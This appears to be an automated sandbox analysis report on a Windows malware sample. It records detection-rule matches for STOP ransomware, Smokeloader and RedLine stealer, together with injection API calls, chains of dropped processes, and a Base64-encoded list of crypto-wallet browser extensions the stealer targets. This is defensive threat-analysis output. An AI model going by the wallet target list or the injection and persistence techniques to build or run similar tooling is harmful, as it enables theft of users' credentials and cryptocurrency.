Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: String function: 00413FF0 appears 54 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401558
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection, 0_2_00401749
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401564
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401523
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401585
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040158C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040159A
Source: C4AA.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\beirutt Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@17/6@3/3
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C676.exe C:\Users\user\AppData\Local\Temp\C676.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\beirutt C:\Users\user\AppData\Roaming\beirutt
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C4AA.exe C:\Users\user\AppData\Local\Temp\C4AA.exe
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C676.exe C:\Users\user\AppData\Local\Temp\C676.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C4AA.exe C:\Users\user\AppData\Local\Temp\C4AA.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{993BE281-6695-4BA5-8A2A-7AACBFAAB69E}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C676.tmp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B005C CreateToolhelp32Snapshot,Module32First, 0_2_007B005C
Source: 9.3.C4AA.exe.df30000.1.unpack, BrEx.cs Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 9.3.C4AA.exe.df30000.0.unpack, BrEx.cs Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVm